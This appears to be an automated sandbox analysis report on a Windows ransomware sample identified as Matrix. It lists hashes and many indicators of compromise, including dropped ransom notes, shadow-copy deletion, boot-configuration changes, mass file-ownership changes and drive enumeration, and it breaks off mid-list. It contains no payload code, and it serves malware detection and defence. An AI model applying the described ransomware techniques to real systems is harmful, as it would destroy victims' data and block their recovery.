Analysis
-
max time kernel
129s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
06-03-2022 01:12
Static task
static1
Behavioral task
behavioral1
Sample
a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe
Resource
win10v2004-en-20220113
General
-
Target
a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe
-
Size
1.3MB
-
MD5
b9b5c6c4e7704fddd39f46d293f2ca08
-
SHA1
7f8d2d8af69405bc5feab6621aea70bc34dd8eb4
-
SHA256
a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3
-
SHA512
aee5caaa7fc5c94741fc44f8a1615fe874c70d95a6be4249433d403d669e1f03fd0dbcfa9926b8897d4237d91ca8714cf9a95a239ff26bb8a2024b91e2a83fe6
Malware Config
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\VisualElements\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_66_x64\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Users\Public\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\8E2QZIJ1\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\ProgramData\Microsoft OneDrive\setup\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#README_CTRM#.rtf a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4268 bcdedit.exe 4496 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS tLRJU41K64.exe -
Executes dropped EXE 64 IoCs
pid Process 3464 NWuBNe4P.exe 3544 tLRJU41K.exe 4924 tLRJU41K64.exe 1656 tLRJU41K.exe 1672 tLRJU41K.exe 2000 tLRJU41K.exe 784 tLRJU41K.exe 2720 tLRJU41K.exe 1148 tLRJU41K.exe 2416 tLRJU41K.exe 1032 tLRJU41K.exe 2620 tLRJU41K.exe 2640 tLRJU41K.exe 2896 tLRJU41K.exe 2056 tLRJU41K.exe 636 tLRJU41K.exe 4304 tLRJU41K.exe 4608 tLRJU41K.exe 3740 tLRJU41K.exe 3216 tLRJU41K.exe 4508 tLRJU41K.exe 4044 tLRJU41K.exe 4620 tLRJU41K.exe 2524 tLRJU41K.exe 2324 tLRJU41K.exe 2300 tLRJU41K.exe 2640 tLRJU41K.exe 784 tLRJU41K.exe 504 tLRJU41K.exe 2720 tLRJU41K.exe 2368 tLRJU41K.exe 3304 tLRJU41K.exe 3624 tLRJU41K.exe 2848 tLRJU41K.exe 4296 tLRJU41K.exe 1940 tLRJU41K.exe 3216 tLRJU41K.exe 4492 tLRJU41K.exe 2140 tLRJU41K.exe 4744 tLRJU41K.exe 808 tLRJU41K.exe 4444 tLRJU41K.exe 1904 tLRJU41K.exe 268 tLRJU41K.exe 2720 tLRJU41K.exe 4740 tLRJU41K.exe 2324 tLRJU41K.exe 4788 tLRJU41K.exe 1480 tLRJU41K.exe 3624 tLRJU41K.exe 3928 tLRJU41K.exe 4384 tLRJU41K.exe 2524 tLRJU41K.exe 3472 tLRJU41K.exe 1112 tLRJU41K.exe 4284 tLRJU41K.exe 2680 tLRJU41K.exe 4508 tLRJU41K.exe 396 tLRJU41K.exe 1408 tLRJU41K.exe 404 tLRJU41K.exe 3340 tLRJU41K.exe 3408 tLRJU41K.exe 4080 tLRJU41K.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\UnlockUnpublish.tiff a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Pictures\UninstallImport.tiff a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000400000001e7c6-134.dat upx behavioral2/files/0x000400000001e7c6-135.dat upx behavioral2/files/0x000400000001e7c6-138.dat upx behavioral2/files/0x000400000001e7c6-139.dat upx behavioral2/files/0x000400000001e7c6-140.dat upx behavioral2/files/0x000400000001e7c6-141.dat upx behavioral2/files/0x000400000001e7c6-143.dat upx behavioral2/files/0x000400000001e7c6-144.dat upx behavioral2/files/0x000400000001e7c6-145.dat upx behavioral2/files/0x000400000001e7c6-146.dat upx behavioral2/files/0x000400000001e7c6-147.dat upx behavioral2/files/0x000400000001e7c6-148.dat upx behavioral2/files/0x000400000001e7c6-149.dat upx behavioral2/files/0x000400000001e7c6-150.dat upx behavioral2/files/0x000400000001e7c6-151.dat upx behavioral2/files/0x000400000001e7c6-152.dat upx behavioral2/files/0x000400000001e7c6-153.dat upx behavioral2/files/0x000400000001e7c6-154.dat upx behavioral2/files/0x000400000001e7c6-155.dat upx behavioral2/files/0x000400000001e7c6-156.dat upx behavioral2/files/0x000400000001e7c6-157.dat upx behavioral2/files/0x000400000001e7c6-158.dat upx behavioral2/files/0x000400000001e7c6-159.dat upx behavioral2/files/0x000400000001e7c6-160.dat upx behavioral2/files/0x000400000001e7c6-161.dat upx behavioral2/files/0x000400000001e7c6-162.dat upx behavioral2/files/0x000400000001e7c6-163.dat upx behavioral2/files/0x000400000001e7c6-164.dat upx behavioral2/files/0x000400000001e7c6-165.dat upx behavioral2/files/0x000400000001e7c6-166.dat upx behavioral2/files/0x000400000001e7c6-167.dat upx behavioral2/files/0x000400000001e7c6-168.dat upx behavioral2/files/0x000400000001e7c6-169.dat upx behavioral2/files/0x000400000001e7c6-170.dat upx behavioral2/files/0x000400000001e7c6-171.dat upx behavioral2/files/0x000400000001e7c6-172.dat upx behavioral2/files/0x000400000001e7c6-173.dat upx behavioral2/files/0x000400000001e7c6-174.dat upx behavioral2/files/0x000400000001e7c6-175.dat upx behavioral2/files/0x000400000001e7c6-176.dat upx behavioral2/files/0x000400000001e7c6-177.dat upx behavioral2/files/0x000400000001e7c6-178.dat upx behavioral2/files/0x000400000001e7c6-179.dat upx behavioral2/files/0x000400000001e7c6-180.dat upx behavioral2/files/0x000400000001e7c6-181.dat upx behavioral2/files/0x000400000001e7c6-182.dat upx behavioral2/files/0x000400000001e7c6-183.dat upx behavioral2/files/0x000400000001e7c6-184.dat upx behavioral2/files/0x000400000001e7c6-185.dat upx behavioral2/files/0x000400000001e7c6-186.dat upx behavioral2/files/0x000400000001e7c6-187.dat upx behavioral2/files/0x000400000001e7c6-188.dat upx behavioral2/files/0x000400000001e7c6-189.dat upx behavioral2/files/0x000400000001e7c6-190.dat upx behavioral2/files/0x000400000001e7c6-191.dat upx behavioral2/files/0x000400000001e7c6-192.dat upx behavioral2/files/0x000400000001e7c6-193.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 1828 takeown.exe 1112 takeown.exe 4844 takeown.exe 1904 takeown.exe 5100 takeown.exe 808 takeown.exe 2720 takeown.exe 664 takeown.exe 2368 takeown.exe 3216 takeown.exe 2324 takeown.exe 2524 takeown.exe 1256 takeown.exe 4296 takeown.exe 3808 takeown.exe 4680 takeown.exe 504 takeown.exe 4080 takeown.exe 4680 takeown.exe 4080 takeown.exe 1252 takeown.exe 2416 takeown.exe 1012 takeown.exe 3472 takeown.exe 2896 takeown.exe 1232 takeown.exe 1752 takeown.exe 3968 takeown.exe 1608 takeown.exe 3340 takeown.exe 3676 takeown.exe 3408 takeown.exe 1720 takeown.exe 332 takeown.exe 2264 takeown.exe 2412 takeown.exe 4496 takeown.exe 4312 takeown.exe 208 takeown.exe 3164 takeown.exe 1608 takeown.exe 4236 takeown.exe 1112 takeown.exe 408 takeown.exe 4080 takeown.exe 4284 takeown.exe 3644 takeown.exe 3052 takeown.exe 4428 takeown.exe 3664 takeown.exe 3152 takeown.exe 3052 takeown.exe 2476 takeown.exe 204 takeown.exe 636 takeown.exe 1916 takeown.exe 2148 takeown.exe 4284 takeown.exe 4304 takeown.exe 1076 takeown.exe 4236 takeown.exe 2476 takeown.exe 3648 takeown.exe 268 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 26 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Documents\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\Downloads\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\Libraries\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Program Files (x86)\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\Videos\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\Desktop\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\Pictures\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\Documents\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Music\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Public\Music\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Links\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Searches\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened for modification C:\Users\Admin\Videos\desktop.ini a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: tLRJU41K64.exe File opened (read-only) \??\R: tLRJU41K64.exe File opened (read-only) \??\T: tLRJU41K64.exe File opened (read-only) \??\Z: tLRJU41K64.exe File opened (read-only) \??\V: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\P: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\E: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\I: tLRJU41K64.exe File opened (read-only) \??\W: tLRJU41K64.exe File opened (read-only) \??\N: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\M: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\N: tLRJU41K64.exe File opened (read-only) \??\S: tLRJU41K64.exe File opened (read-only) \??\G: tLRJU41K64.exe File opened (read-only) \??\U: tLRJU41K64.exe File opened (read-only) \??\Y: tLRJU41K64.exe File opened (read-only) \??\T: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\O: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\G: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\B: tLRJU41K64.exe File opened (read-only) \??\H: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\A: tLRJU41K64.exe File opened (read-only) \??\F: tLRJU41K64.exe File opened (read-only) \??\X: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\S: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\Q: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\K: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\L: tLRJU41K64.exe File opened (read-only) \??\O: tLRJU41K64.exe File opened (read-only) \??\V: tLRJU41K64.exe File opened (read-only) \??\W: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\R: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\J: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\E: tLRJU41K64.exe File opened (read-only) \??\Z: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\U: a6df222572f57fabf6896d7dd6cca8e9ed8941e896b3094f7707ad9a700696c3.exe File opened (read-only) \??\H: tLRJU41K64.exe File opened (read-only) \??\X: tLRJU41K64.exe File opened (read-only) \??\I: 